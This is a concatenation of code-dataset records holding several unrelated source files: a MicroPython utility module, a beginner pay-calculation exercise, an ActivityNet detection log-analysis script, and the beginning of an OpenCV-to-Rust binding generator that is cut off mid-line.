x: any\n the object to be returned\n\n :result: any\n the parameter\n\n This function returns its argument unmodified.\n This is used as a do-nothing default for a parameter.\n\n example::\n $insert_example( \"test_tools.py\", \"unity example\", 1 )\n \"\"\"\n return x\n\n\n# ===========================================================================\n\ndef within(\n a: any,\n low: any,\n high: any\n) -> bool:\n \"\"\"\n test whether a value is between two bounds\n\n :param a: any\n the value to be checked\n\n :param low: any\n the lower bound to check the value against\n\n :param high: any\n the higher bound to check the value against\n\n :result: any\n whether a is in the trange [low..high]\n\n This function returns whether a is between low and high.\n The low and high values are included in the allowed range.\n\n Low and high must be in order: low =< high.\n If they are not the function will return False.\n\n examples::\n $insert_example( \"test_tools.py\", \"within example\", 1 )\n \"\"\"\n return ( a >= low ) and ( a <= high )\n\n\n# ===========================================================================\n\ndef clamp(\n x: any,\n low: any,\n high: any\n) -> any:\n \"\"\"\n x, clamped to the nearest value in the range [low..high]\n\n :param x: any\n the value to clamp within the range [low..high]\n\n :param low: any\n the lower bound of the clamp interval\n\n :param high: any\n the higher bound of the clamp interval\n\n :result: any\n either x, or the nearest value in the range [low..high]\n\n This function returns max( low, min( x, high ) ).\n\n examples::\n $insert_example( \"test_tools.py\", \"clamp example\", 1 )\n \"\"\"\n\n return max( low, min( x, high ) )\n\n\n# ===========================================================================\n\ndef invert_bits(\n value: int,\n n_bits: int\n) -> int:\n \"\"\"\n the value, with its lowqer n_bits bits inverted\n\n :param value: int\n the value to invert\n\n :param n_bits: int\n the number of valid bits in the value\n\n :result: int\n the value, with its lower n_bits bits inverted\n\n This function returns the value, of which n_bits are relevant,\n with those bits inverted.\n The higher bits in the returned value are 0 (clear).\n\n examples::\n $insert_example( \"test_tools.py\", \"invert_bits example\", 1 )\n \"\"\"\n\n return ( ~ value ) & ( ( 0b1 << n_bits ) - 1 )\n\n\n# ===========================================================================\n\ndef mirror_bits(\n value: int,\n n_bits: int\n) -> int:\n \"\"\"\n the value, with its lower n_bit bits mirrored\n\n :param value: int\n the value to mirror\n\n :param n_bits: int\n the number of valid bits in the value\n\n :result: int\n the value, with its lower n_bits bits mirrored\n\n This function returns the value, of which n_bits are relevant,\n with the bits mirrored (most significant bit becomse the least\n signififacnt bit and vice verse, etc.)\n The higher bits in the returned value are 0 (clear).\n\n examples::\n $insert_example( \"test_tools.py\", \"mirror_bits example\", 1 )\n \"\"\"\n\n result = 0\n for _ in range( n_bits ):\n result = ( result << 1 ) | ( value & 0b01 )\n value = value >> 1\n return result\n\n\n# ===========================================================================\n\ndef bar_bits(\n n_bits: int\n) -> int:\n \"\"\"\n unsigned int value with (only) the lower n_ones bits 1\n\n :param n_bits: int\n the number of 1-value bits in the result\n\n :result: int\n unsigned int value, with (only) the lower n_bits bits 1\n\n This function returns the integer value,\n of which the lowest n_ones bits\n are 1 (set), the other (higher) bits are 0 (clear).\n\n examples::\n $insert_example( \"test_tools.py\", \"bar_bits example\", 1 )\n \"\"\"\n\n result = 0\n for _ in range( n_bits ):\n result = ( result << 1 ) | 0b1\n return result\n\n\n# ===========================================================================\n\ndef is_iterable(\n x: any\n) -> bool:\n \"\"\"\n test for iterability\n\n :param x: any\n the object to be tested for iterability\n\n :result: bool\n whether x is iterable\n\n The standard way to test for iterability is to use\n from collections.abc import Iterable,\n but this is not (yet?) available in MicroPython.\n Hence this workaround.\n \"\"\"\n try:\n for _ in x:\n return True\n return True\n except TypeError:\n return False\n\n\n# ===========================================================================\n\ndef first_not_none(\n *args: any\n) -> any:\n \"\"\"\n return the first not None argument\n\n :param args: any\n the arguments that are considered\n\n :result: any\n the first of the \\*args that is not None\n\n This function returns the first argument that is not None.\n It is usefull to replace a default of None with\n a default value that can't be specified as a default.\n\n When there is only one argument and it is iterable,\n it is used as the list of alternatives.\n\n If all arguments are None, None is returned.\n\n examples::\n $insert_example( \"test_tools.py\", \"first_not_none example\", 1 )\n \"\"\"\n\n if ( len( args ) == 1 ) and is_iterable( args[ 0 ] ):\n args = args[ 0 ]\n\n for x in args:\n if x is not None:\n return x\n\n return None\n\n\n# ===========================================================================\n\ndef make_tuple(\n *args: any\n) -> any:\n \"\"\"\n make a tuple from a tuple or list, or from a number of arguments\n\n :param \\*args: any\n the arguments are to be turned into a tuple\n\n :result: any\n a tuple constructed from the \\*args\n\n When called with one argument, which is a list or a tuple,\n this function returns it as a tuple.\n Otherwise, it returns a tuple of its argument(s).\n\n examples::\n $insert_example( \"test_tools.py\", \"make_tuple example\", 1 )\n \"\"\"\n\n if len( args ) == 1 and isinstance( args[ 0 ], ( list, tuple ) ):\n return tuple( args[ 0 ] )\n else:\n return tuple( args )\n\n\n# ===========================================================================\n\ndef make_list(\n *args: any\n) -> any:\n \"\"\"\n make a list from a tuple or list, or from a number of arguments\n\n :param args: any\n the arguments are to be turned into a list\n\n :result: any\n a list constructed from the \\*args\n\n When called with one argument, which is a list or a tuple,\n this function returns it as a list.\n Otherwise, it returns a list of its argument(s).\n\n examples::\n $insert_example( \"test_tools.py\", \"make_list example\", 1 )\n \"\"\"\n\n if len( args ) == 1 and isinstance( args[ 0 ], ( list, tuple ) ):\n return list( args[ 0 ] )\n else:\n return list( args )\n\n\n# ===========================================================================\n\ndef nth_from(\n n: int | bool,\n *args: any\n) -> any:\n \"\"\"\n the n-th argument\n\n :param n: int | bool\n the index into the arguments\n\n :param \\*args: any\n the arguments from which the n-th is to be selected\n\n :result: any\n the n-th of the \\*args\n\n This function returns the n-th of the \\*args.\n If the number of \\*args is 1 and it is a list or tuple,\n the function returns the n-th element from it\n (the first element is the 0th).\n\n If the n argument is a boolean, it will be interpreted\n as 0 and 1, and the number of things to choose from must\n be 2.\n Note that in that case the false-option comes first,\n which is unlike a Python conditional expression\n or a c \\/ c++ ?-expression.\n\n examples::\n $insert_example( \"test_tools.py\", \"nth_from example\", 1 )\n \"\"\"\n\n options = make_tuple( *args )\n\n if isinstance( n, bool ):\n n = int( n )\n if len( options ) != 2:\n raise IndexError\n\n return options[ n ]\n\n\n# ===========================================================================\n\ndef bytes_from_int(\n value: int,\n n_bytes: int\n) -> bytes:\n \"\"\"bytes lsb-first representation of an int\n\n :param value: int\n the value to be converted to bytes\n\n :param n_bytes: int\n the desired number of bytes\n\n :result: bytes\n the bytes representation of the value\n\n This function returns the int value as n_byte bytes,\n least significant byte first (little endian).\n\n examples::\n $insert_example( \"test_tools.py\", \"bytes_from_int example\", 1 )\n \"\"\"\n\n array = bytearray( n_bytes )\n for i in range( 0, n_bytes ):\n array[ i ] = value & 0xFF\n value = value >> 8\n return bytes( array )\n\n\n# ===========================================================================\n\ndef int_from_bytes(\n array: bytes | bytearray,\n signed: bool = False\n) -> int:\n \"\"\"int value from a lowest-byte-first sequence of bytes\n\n :param array: bytes | bytearray\n the array of bytes that is to be converted to an integer\n \n :param signed: bool\n treat the resulting bit pattern as unsigned (False, default)\n or signed (True)\n\n :result: int\n the array interpreted as integer value\n\n This function returns the bytes as an unsigned integer value,\n the first byte as least significant byte of the int value.\n \n Python has the int.from_bytes function, but it is currently\n not implemented fully and correctly in MicroPython.\n Hence this alternative.\n\n examples::\n $insert_example( \"test_tools.py\", \"int_from_bytes example\", 1 )\n \"\"\"\n\n result = 0\n for i in range( len( array ) - 1, -1, -1 ):\n result = ( result << 8 ) | ( array[ i ] & 0xFF ) \n \n if signed and ( ( array[ -1 ] & 0x80 ) != 0 ):\n result = - ( ( result - 1 ) ^ bar_bits( 8 * len( array ) ) )\n \n return result \n\n \n# ===========================================================================\n\ndef elapsed_us( f ):\n \"\"\"\n execute function and return the elapsed time in microseconds\n \"\"\"\n \n from godafoss.gf_time import ticks_us\n \n before = ticks_us()\n f()\n after = ticks_us()\n return after - before \n\n\n# ===========================================================================\n\nclass immutable:\n \"\"\"\n make an object immutable\n\n Python names are references, and class objects are mutable,\n so a class member variable can inadvertently be modified.\n The xy class is immutable, but if it were not, this would\n be possible::\n\n origin = xy( 0, 0 )\n a = origin\n a.x = 10 # this modifies the object that origin references!\n print( origin.x ) # prints 10\n\n To prevent such modifications, a value class inherits from freeze,\n and calls immutable._init__( self ) when all its members\n have been initialized.\n\n $macro_start immutable\n Values (objects) of this class are immutable.\n $macro_end\n\n usage example::\n $insert_example( \"test_tools.py\", \"immutable example\", 1 )\n \"\"\"\n\n _frozen = False\n\n # =======================================================================\n\n def __init__( self ) -> None:\n \"\"\"\n after the initialization, the object members can't be modified\n \"\"\"\n self._frozen = True\n\n # =======================================================================\n\n def __delattr__( self, *args, **kwargs ):\n if self._frozen:\n raise TypeError( \"immutable object\" )\n object.__delattr__( self, *args, **kwargs )\n\n # =======================================================================\n\n def __setattr__( self, *args, **kwargs ):\n if self._frozen:\n raise TypeError( \"immutable object\" )\n object.__setattr__( self, *args, **kwargs )\n\n # =======================================================================\n\n\n# ===========================================================================\n\nclass repeater:\n \"\"\"\n iterate the indicated number of iterations, or forever when None\n\n :param iterations: int | None\n the number of iterations, or None for infinite iterationfs\n\n This iterator is usefull for iterative demos that by default\n must run forever, but might be used to run a fixed numer of times.\n\n examples::\n\n for _ in repeater( 10 ): ... # ... is repeated 10 times\n for _ in repeater( None ): ... # ... is repeated forever\n \"\"\"\n\n # =======================================================================\n\n def __init__(\n self,\n iterations: int | None\n ) -> None:\n self.iterations = iterations\n self.n = None\n\n # =======================================================================\n\n def __iter__( self ):\n self.n = 0\n return self\n\n # =======================================================================\n\n def __next__( self ):\n if self.iterations is not None:\n self.n += 1\n if self.n > self.iterations:\n raise StopIteration\n return self.n\n\n # =======================================================================\n \n# ===========================================================================\n\nclass remember:\n \"\"\"\n \"\"\"\n \n def __init__( self, addresses ):\n self._addresses = [ address for address in addresses ]\n self._data = [ machine.mem32[ address ] for address in addresses ]\n \n def restore( self ):\n for address, data in zip( self._addresses, self._data ):\n machine.mem32[ address ] = data\n \n\n# ===========================================================================\n","sub_path":"source/godafoss/gf_tools.py","file_name":"gf_tools.py","file_ext":"py","file_size_in_byte":14843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"560692505","text":"\r\ndef computepay(hours, rate):\r\n #print(\"In computepay\")\r\n if hours > 40 :\r\n pay = (hours - 40) * 1.5 * rate + 40 * rate\r\n\r\n else :\r\n pay = hours * int(rate)\r\n #print(\"Returning\", pay)\r\n return pay\r\n\r\nsh = input(\"Enter Hours: \")\r\nsr = input(\"Enter Rate: \")\r\nfh = float(sh)\r\nfr = float(sr)\r\n\r\nxp = computepay(fh, fr)\r\n\r\nprint(\"Pay:\", xp)\r\n","sub_path":"chap4/ex04_06.py","file_name":"ex04_06.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409692918","text":"# --------------------------------------------------------\n# R-C3D\n# Copyright (c) 2017 Boston University\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Huijuan Xu\n# --------------------------------------------------------\n\nimport sys, os, errno\nimport numpy as np\nimport csv\nimport json\nimport copy\n\nassert len(sys.argv) == 2, \"Usage: python log_analysis.py \"\nlogfile = sys.argv[1]\n\n\ndef nms(dets, thresh=0.4):\n \"\"\"Pure Python NMS baseline.\"\"\"\n if len(dets) == 0: return []\n x1 = dets[:, 0]\n x2 = dets[:, 1]\n scores = dets[:, 2]\n lengths = x2 - x1\n order = scores.argsort()[::-1]\n keep = []\n while order.size > 0:\n i = order[0]\n keep.append(i)\n xx1 = np.maximum(x1[i], x1[order[1:]])\n xx2 = np.minimum(x2[i], x2[order[1:]])\n inter = np.maximum(0.0, xx2 - xx1)\n ovr = inter / (lengths[i] + lengths[order[1:]] - inter)\n inds = np.where(ovr <= thresh)[0]\n order = order[inds + 1]\n return keep\n\ndef generate_classes():\n META_FILE = '../../../preprocess/activityNet/activity_net.v1-3.min.json'\n data = json.load(open(META_FILE))\n class_list = []\n for vid, vinfo in data['database'].iteritems():\n for item in vinfo['annotations']:\n class_list.append(item['label'])\n\n class_list = list(set(class_list))\n classes = {0: 'Background'}\n for i,cls in enumerate(class_list):\n classes[i+1] = cls\n return classes\n\nclasses = generate_classes()\n\ndef get_segments(data, thresh):\n segments = []\n vid = 'Background'\n find_next = False\n tmp = {'label' : 0, 'score': 0, 'segment': [0, 0]}\n for l in data:\n # video name and sliding window length\n if \"fg_name :\" in l:\n vid = l.split('/')[5]\n\n # frame index, time, confident score\n elif \"frames :\" in l:\n start_frame=int(l.split()[4])\n end_frame=int(l.split()[5])\n stride = int(l.split()[6].split(']')[0])\n\n elif \"activity:\" in l:\n label = int(l.split()[1])\n tmp['label'] = label\n find_next = True\n\n elif \"im_detect\" in l:\n return vid, segments\n\n elif find_next:\n left_frame = float(l.split()[1])*stride + start_frame\n right_frame = float(l.split()[2])*stride + start_frame\n if (left_frame < end_frame) and (right_frame <= end_frame):\n left = left_frame / 25.0\n right = right_frame / 25.0\n score = float(l.split()[3].split(']')[0])\n if score > thresh:\n tmp1 = copy.deepcopy(tmp)\n tmp1['score'] = score\n tmp1['segment'] = [left, right]\n segments.append(tmp1)\n elif (left_frame < end_frame) and (right_frame > end_frame):\n if (end_frame-left_frame)*1.0/(right_frame-left_frame)>=0:\n right_frame = end_frame\n left = left_frame / 25.0\n right = right_frame / 25.0\n score = float(l.split()[3].split(']')[0])\n if score > thresh:\n tmp1 = copy.deepcopy(tmp)\n tmp1['score'] = score\n tmp1['segment'] = [left, right]\n segments.append(tmp1)\n\n\ndef analysis_log(logfile, thresh):\n with open(logfile, 'r') as f:\n lines = f.read().splitlines()\n predict_data = []\n res = {}\n for l in lines:\n if \"frames :\" in l:\n predict_data = []\n predict_data.append(l)\n if \"im_detect:\" in l:\n vid, segments = get_segments(predict_data, thresh)\n if vid not in res:\n res[vid] = []\n res[vid] += segments\n return res\n\nsegmentations = analysis_log(logfile, thresh = 0.005)\n\n\ndef select_top(segmentations, nms_thresh=0.99999, num_cls=0, topk=0):\n res = {}\n for vid, vinfo in segmentations.iteritems():\n # select most likely classes\n if num_cls > 0:\n ave_scores = np.zeros(201)\n for i in xrange(1, 201):\n ave_scores[i] = np.sum([d['score'] for d in vinfo if d['label']==i])\n labels = list(ave_scores.argsort()[::-1][:num_cls])\n else:\n labels = list(set([d['label'] for d in vinfo]))\n\n # NMS\n res_nms = []\n for lab in labels:\n nms_in = [d['segment'] + [d['score']] for d in vinfo if d['label'] == lab]\n keep = nms(np.array(nms_in), nms_thresh)\n for i in keep:\n tmp = {'label':classes[lab], 'score':nms_in[i][2], 'segment': nms_in[i][0:2]}\n res_nms.append(tmp)\n \n # select topk\n scores = [d['score'] for d in res_nms]\n sortid = np.argsort(scores)[-topk:]\n res[vid] = [res_nms[id] for id in sortid]\n return res\n\nsegmentations = select_top(segmentations)\n\n\nres = {'version': 'VERSION 1.3', \n 'external_data': {'used': True, 'details': 'C3D pre-trained on sport-1M training set'},\n 'results': {}}\nfor vid, vinfo in segmentations.iteritems():\n res['results'][vid] = vinfo\n\n\nwith open('results.json', 'w') as outfile:\n json.dump(res, outfile)\n","sub_path":"experiments/activitynet/test/activitynet_log_analysis.py","file_name":"activitynet_log_analysis.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"250281068","text":"import sys, re, os.path\nimport logging\nfrom pprint import pformat\nfrom string import Template\n\nif sys.version_info[0] >= 3:\n from io import StringIO\nelse:\n from cStringIO import StringIO\n\n#\n# EXCEPTIONS TO AUTO GENERATION\n#\n\nManualFuncs = {\n \"core\" : [\n [ \"class cv.Mat\" , \"\", [], [] ],\n [ \"cv.Mat.Mat\", \"Mat\", [], [] ],\n [ \"cv.Mat.Mat\", \"Mat\", [],\n [ [ \"int\", \"rows\" ], [ \"int\", \"cols\" ], [ \"int\" , \"type\" ] ] ],\n [ \"cv.Mat.depth\", \"int\", [\"/C\"], [] ],\n [ \"cv.Mat.type\", \"int\", [\"/C\"], [] ],\n [ \"cv.Mat.channels\", \"int\", [\"/C\"], [] ],\n [ \"cv.Mat.size\", \"Size\", [\"/C\"], [] ],\n [ \"cv.Mat.elemSize\", \"size_t\", [\"/C\"], [] ],\n [ \"cv.Mat.isContinuous\", \"bool\", [\"/C\"], [] ],\n [ \"cv.Mat.clone\", \"Mat\", [\"/C\"], [] ],\n [ \"cv.Mat.copyTo\", \"void\", [\"/C\"], [[\"Mat\", \"OutputArray\"]] ],\n [ \"cv.Mat.convertTo\", \"void\", [\"/C\"], [ [\"Mat\", \"OutputArray\"], [\"int\", \"rtype\"], [\"double\", \"scale\"]] ],\n [ \"cv.Mat.ptr\", \"uchar*\", [\"/C\"], [[\"int\", \"Row\"]] ],\n ]\n}\n\nrenamed_funcs = {\n \"cv_core_divide_MMMDI\": \"divide_mat\",\n \"cv_core_norm_MMIM\":\"norm_dist\",\n \"cv_core_ellipse_MPSDDDSIII\": \"ellipse_tilted\",\n \"cv_core_Mat_Mat_III\": \"for_rows_and_cols\",\n \"cv_core_Mat_type\": \"cv_type\",\n \"cv_calib3d_StereoSGBM_StereoSGBM_IIIIIIIIIIB\": \"for_params\",\n \"cv_calib3d_StereoBM_StereoBM_III\": \"for_params\",\n \"cv_features2d_BOWKMeansTrainer_cluster_M\": \"cluster_with_desc\",\n \"cv_features2d_BOWTrainer_cluster_M\": \"cluster_with_desc\",\n \"cv_features2d_DescriptorMatcher_match_MMVM\" : \"matches\",\n \"cv_features2d_DescriptorMatcher_match_MVV\" : \"matches\",\n \"cv_features2d_KeyPoint_KeyPoint_FFFFFII\" : \"for_params\",\n \"cv_features2d_DMatch_DMatch_IIF\" : \"for_params\",\n \"cv_features2d_DMatch_DMatch_IIIF\" : \"for_image\",\n \"cv_features2d_DescriptorMatcher_knnMatch_MMVIMB\" : \"knnTrainMatch\",\n \"cv_features2d_DescriptorMatcher_match_MMVM\": \"trainAndMatch\",\n \"cv_features2d_BRISK_BRISK_VVFFV\" : \"for_pattern\",\n \"cv_highgui_VideoWriter_VideoWriter_SIDSB\" : \"for_params\",\n \"cv_highgui_VideoCapture_VideoCapture_S\" : \"for_file\",\n \"cv_highgui_VideoCapture_VideoCapture_I\" : \"for_device\",\n \"cv_highgui_VideoCapture_open_S\" : \"open_file\",\n \"cv_highgui_VideoCapture_open_I\" : \"open_fd\",\n \"cv_imgproc_integral_MMMI\" : \"integral_squares\",\n \"cv_imgproc_integral_MMMMI\" : \"integral_squares_tilted\",\n \"cv_imgproc_distanceTransform_MMMIII\" : \"distance_tranform_labels\",\n \"cv_imgproc_Subdiv2D_Subdiv2D_R\" : \"for_rect\",\n \"cv_imgproc_Subdiv2D_insert_V\" : \"insert_multi\",\n \"cv_objdetect_HOGDescriptor_HOGDescriptor_S\": \"for_file\",\n \"cv_objdetect_HOGDescriptor_HOGDescriptor_SSSSIIDIDBI\": \"for_params\",\n \"cv_objdetect_CascadeClassifier_detectMultiScale_MVVVDIISSB\" : \"detectMultiScaleFull\",\n \"cv_objdetect_CascadeClassifier_CascadeClassifier_S\": \"for_file\",\n \"cv_video_calcOpticalFlowSF_MMMIIIDDIDDDIDDD\" : \"calc_optical_flow_full\",\n \"cv_video_KalmanFilter_KalmanFilter_IIII\" : \"for_params\",\n \"cv_video_BackgroundSubtractorMOG_BackgroundSubtractorMOG_IIDD\" : \"for_params\",\n \"cv_video_BackgroundSubtractorMOG2_BackgroundSubtractorMOG2_IFB\" : \"for_params\",\n}\n\nclass_ignore_list = (\n #core\n \"FileNode\", \"FileStorage\", \"KDTree\", \"IndexParams\", \"Params\"\n #videoio\n# \"VideoWriter\",\n)\n\nconst_ignore_list = (\n \"CV_EXPORTS_W\", \"CV_EXPORTS_W_SIMPLE\", \"CV_EXPORTS_W_MAP\", \"CV_MAKE_TYPE\",\n \"CV_IS_CONT_MAT\", \"CV_RNG_COEFF\", \"IPL_IMAGE_MAGIC_VAL\",\n \"CV_SET_ELEM_FREE_FLAG\", \"CV_FOURCC_DEFAULT\",\n \"CV_WHOLE_ARR\", \"CV_WHOLE_SEQ\", \"CV_PI\", \"CV_LOG2\",\n \"CV_TYPE_NAME_IMAGE\",\n\n)\n\nfunc_arg_fix = {\n}\n\n#\n# TYPES MAPPING\n#\n\nprimitives = {\n u\"void\" : { u\"ctype\": \"void\", \"rtype\": \"()\" },\n u\"bool\" : { u\"ctype\": \"int\", u\"rtype\": \"bool\" },\n u\"uchar\" : { u\"ctype\": \"unsigned char\", u\"rtype\": \"u8\" },\n u\"short\" : { u\"ctype\": \"short\", u\"rtype\": \"u16\" },\n u\"int\" : { u\"ctype\": \"int\", u\"rtype\": \"i32\" },\n u\"size_t\": { u\"ctype\": \"std::size_t\", u\"rtype\": \"::libc::types::os::arch::c95::size_t\" },\n u\"int64\" : { u\"ctype\": \"int64\", u\"rtype\": \"i64\" },\n u\"float\" : { u\"ctype\": \"float\", u\"rtype\": \"f32\" },\n u\"double\": { u\"ctype\": \"double\", u\"rtype\": \"f64\" },\n u\"uchar*\": { u\"ctype\": \"unsigned char*\", u\"rtype\": \"*mut u8\" }\n}\n\n# trait_classes = [ \"Algorithm\" ]\n\nforced_boxed_classes = { }\n\nvalue_struct_types = {\n (\"core\", \"Point\") : ((\"x\", \"int\"), (\"y\", \"int\")),\n (\"core\", \"Point2d\") : ((\"x\", \"double\"), (\"y\", \"double\")),\n (\"core\", \"Point2f\") : ((\"x\", \"float\"), (\"y\", \"float\")),\n (\"core\", \"Size\") : ((\"width\", \"int\"), (\"height\", \"int\")),\n (\"core\", \"Size2f\") : ((\"width\", \"float\"), (\"height\", \"float\")),\n (\"core\", \"Rect\") : ((\"x\", \"int\"), (\"y\", \"int\"), (\"width\", \"int\"), (\"height\", \"int\")),\n (\"core\", \"RotatedRect\") : ((\"x\", \"float\"), (\"y\", \"float\"), (\"width\", \"float\"),(\"height\", \"float\"), (\"angle\", \"float\")),\n (\"core\", \"TermCriteria\") : ((\"type\", \"int\"), (\"maxCount\", \"int\"), (\"epsilon\", \"double\")),\n (\"core\", \"Scalar\") : ((\"data\", \"double[4]\"),)\n}\n\nfor s in [2,3,4,6]:\n for t in [(\"uchar\",\"b\"),(\"short\",\"s\"),(\"int\",\"i\"),(\"double\",\"d\"),(\"float\",\"f\")]:\n value_struct_types[(\"core\",\"Vec%d%s\"%(s,t[1]))] = (\"data\", \"%s[%d]\"%(t[0],s)),\n\n#\n# TEMPLATES\n#\n\nT_CPP_MODULE = \"\"\"\n//\n// This file is auto-generated, please don't edit!\n//\n\n#define LOG_TAG \"org.opencv.$m\"\n\n#include \"stdint.h\"\n#include \"common.h\"\n\ntypedef int64_t int64;\n\n#include \"types.h\"\n#include \n\n#include \"return_types.h\"\n\n#include \"opencv2/opencv_modules.hpp\"\n#ifdef HAVE_OPENCV_$M\n\n#include \n\n#include \"opencv2/$m/$m.hpp\"\nusing namespace cv;\n\n$includes\n\nextern \"C\" {\n\n$code\n\n} // extern \"C\"\n\n#endif // HAVE_OPENCV_$M\n\"\"\"\n\nT_RUST_MODULE = \"\"\"\n//\n// This file is auto-generated, please don't edit!\n//\n\n\nuse ::sys::$m::*;\n\npub mod $m {\n use sys::types::*;\n use std::ffi::{ CStr, CString };\n use std::mem::transmute;\n use libc::types::common::c95::c_void;\n\n $module_import\n $code\n}\n\n\"\"\"\n\nconst_private_list = (\n \"CV_MOP_.+\",\n \"CV_INTER_.+\",\n \"CV_THRESH_.+\",\n \"CV_INPAINT_.+\",\n \"CV_RETR_.+\",\n \"CV_CHAIN_APPROX_.+\",\n \"OPPONENTEXTRACTOR\",\n \"GRIDDETECTOR\",\n \"PYRAMIDDETECTOR\",\n \"DYNAMICDETECTOR\",\n)\n\n#\n# AST-LIKE\n#\n\nclass GeneralInfo():\n def __init__(self, gen, name, namespaces):\n self.gen = gen\n self.namespace, self.classpath, self.classname, self.name = self.parseName(name, namespaces)\n\n def parseName(self, name, namespaces):\n '''\n input: full name and available namespaces\n returns: (namespace, classpath, classname, name)\n '''\n name = name[name.find(\" \")+1:].strip() # remove struct/class/const prefix\n spaceName = \"\"\n localName = name # .\n for namespace in sorted(namespaces, key=len, reverse=True):\n if name.startswith(namespace + \".\"):\n spaceName = namespace\n localName = name.replace(namespace + \".\", \"\")\n break\n pieces = localName.split(\".\")\n if len(pieces) > 2: # ...\n return spaceName, \".\".join(pieces[:-1]), pieces[-2], pieces[-1]\n elif len(pieces) == 2: # .\n return spaceName, pieces[0], pieces[0], pieces[1]\n elif len(pieces) == 1: # \n return spaceName, \"\", \"\", pieces[0]\n else:\n return spaceName, \"\", \"\" # error?!\n\ndef make_cpp_type(t):\n if(t == \"size_t\"):\n return t\n return t.replace(\"_\", \"::\")\n\nclass ArgInfo():\n def __init__(self, gen, arg_tuple): # [ ctype, name, def val, [mod], argno ]\n self.gen = gen\n self.pointer = False\n type = arg_tuple[0]\n if type.endswith(\"*\"):\n type = type[:-1]\n self.pointer = True\n if type == \"String\":\n type = \"string\"\n if type == \"Size2i\":\n type = \"Size\"\n self.ctype = type\n self.type = make_cpp_type(type)\n self.name = arg_tuple[1]\n self.defval = \"\"\n self.typeinfo = None\n if len(arg_tuple) > 2:\n self.defval = arg_tuple[2]\n self.out = \"\"\n if len(arg_tuple) > 3 and \"/O\" in arg_tuple[3]:\n self.out = \"O\"\n if len(arg_tuple) > 3 and \"/IO\" in arg_tuple[3]:\n self.out = \"IO\"\n\n def rsname(self):\n rsname = self.name\n if rsname in [\"type\",\"box\"]:\n rsname = \"_\" + rsname\n return rsname\n\n def type_info(self):\n if self.typeinfo == None:\n self.typeinfo = self.gen.get_type_info(self.type)\n return self.typeinfo\n\n def __repr__(self):\n return Template(\"ARG $ctype$p $name=$defval\").substitute(ctype=self.type,\n p=\" *\" if self.pointer else \"\",\n name=self.name,\n defval=\"\" #self.defval\n )\n\nclass FuncInfo(GeneralInfo):\n def __init__(self, gen, decl, namespaces=[]): # [ funcname, return_ctype, [modifiers], [args] ]\n GeneralInfo.__init__(self, gen, decl[0], namespaces)\n self.isconstructor = self.name == self.classname\n self.overridename = self.name\n self.ci = None\n for m in decl[2]:\n if m.startswith(\"=\"):\n self.overridename = m[1:]\n self.static = [\"\",\"static\"][ \"/S\" in decl[2] ]\n if self.isconstructor:\n self.type = \"::\".join(decl[0].split(\".\")[1:-1])\n else:\n self.type = make_cpp_type(decl[1])\n if self.type == \"Size2i\":\n self.type = \"Size\"\n self.cppname = self.name.replace(\".\", \"::\")\n self.cname = \"_\".join(decl[0].split(\".\")[1:])\n self.args = []\n self.class_nested_cppname = \"::\".join(decl[0].split(\".\")[1:-1])\n for a in decl[3]:\n self.args.append(ArgInfo(gen, a))\n if self.isconstructor:\n self.name = \"new\"\n self.const = \"/C\" in decl[2]\n\n # register self to class or generator\n if self.class_nested_cppname == \"\":\n gen.functions.append(self)\n elif gen.is_ignored(self.class_nested_cppname):\n logging.info('ignored: %s', self)\n elif self.class_nested_cppname in ManualFuncs:\n logging.info('manual: %s', self)\n elif gen.is_ignored(self.class_nested_cppname):\n pass\n else:\n self.ci = gen.get_class(self.class_nested_cppname)\n self.ci.add_method(self)\n\n def rv_header_type(self):\n return self.ci.nested_cppname if self.isconstructor else self.type\n\n def rv_type(self):\n return self.gen.get_type_info(self.rv_header_type())\n\n def reason_to_skip(self):\n if self.overridename == \"operator ()\":\n msg = \"can not map operator () yet\"\n return msg\n\n for a in self.args:\n if self.gen.is_ignored(a.type):\n msg = \"can not map type %s yet\"%(a.type)\n return msg\n\n return None\n\n def gen_cpp_prelude(self):\n io = StringIO()\n io.write(\"// %s %s %s\\n\"%(self.cppname,\n \"(constructor)\" if self.isconstructor else \"(method)\",\n \"(const)\" if self.const else \"(mut)\"))\n io.write(\"// %s\\n\"%(self))\n for a in self.args:\n io.write(\"// Arg %s %s =%s\\n\"%(a.name, a.type_info(), a.defval))\n io.write(\"// Return value: %s\\n\"%(self.rv_type()))\n return io.getvalue()\n\n def c_name(self):\n if len(self.args) > 0:\n suffix = \"_\" + \"\".join(map(lambda a:a.type[0].capitalize(), self.args))\n else:\n suffix = \"\"\n if self.ci == None:\n return \"cv_%s_%s%s\"%(self.gen.module, self.overridename, suffix);\n else:\n return \"cv_%s_%s_%s%s\"%(self.gen.module, self.ci.nested_cname, self.overridename, suffix);\n\n # \"const\", \"mut\", or None\n def instance(self):\n if not self.ci == None and not self.isconstructor:\n return \"const\" if self.const else \"mut\"\n return None\n\n def gen_rust_extern(self):\n rust_extern_rs = \"rv::cv_return_value_%s\"%(self.rv_type().ctype.replace(\"*\",\"_\").replace(\" \",\"_\").replace(\":\",\"_\"))\n\n args = []\n if self.instance():\n args.append(\"instance: *%s c_void\"%(self.instance()))\n for a in self.args:\n atype = a.type_info()\n args.append(a.rsname() + \": \" + (atype.rctype or atype.rtype))\n\n return \"pub fn %s(%s) -> %s;\\n\"%(self.c_name(), \", \".join(args), rust_extern_rs)\n\n def gen_rustdoc_default_args(self):\n rust_args_default_doc = \"\"\n for a in self.args:\n atype = a.type_info()\n if a.defval != \"\":\n rust_args_default_doc += \\\n \" /// * %s: default %s\\n\"%(a.rsname(), a.defval)\n return rust_args_default_doc\n\n def gen_rust_wrapper(self):\n args = []\n call_args = []\n if self.instance() == \"const\":\n args.append(\"&self\")\n call_args.append(\"self.as_ptr()\")\n elif self.instance() == \"mut\":\n args.append(\"&mut self\")\n call_args.append(\"self.as_ptr()\")\n\n for a in self.args:\n atype = a.type_info()\n rtype = atype.rtype\n\n if atype.is_string:\n args.append(\"%s:&str\"%(a.rsname()))\n elif atype.is_primitive or atype.is_value or atype.is_simple:\n args.append(a.rsname() + \":\" + rtype)\n elif a.out == \"O\" or a.out == \"IO\":\n args.append(a.rsname() + \":&mut \" + rtype)\n else:\n args.append(a.rsname() + \":& \" + rtype)\n\n if atype.is_boxed or 